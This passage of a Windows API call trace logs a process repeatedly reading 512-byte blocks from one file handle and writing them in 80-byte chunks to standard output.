lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.165] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.166] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.167] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.167] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.168] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.168] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.170] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.170] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.171] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.171] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.172] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.172] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.174] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.174] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.175] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.175] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 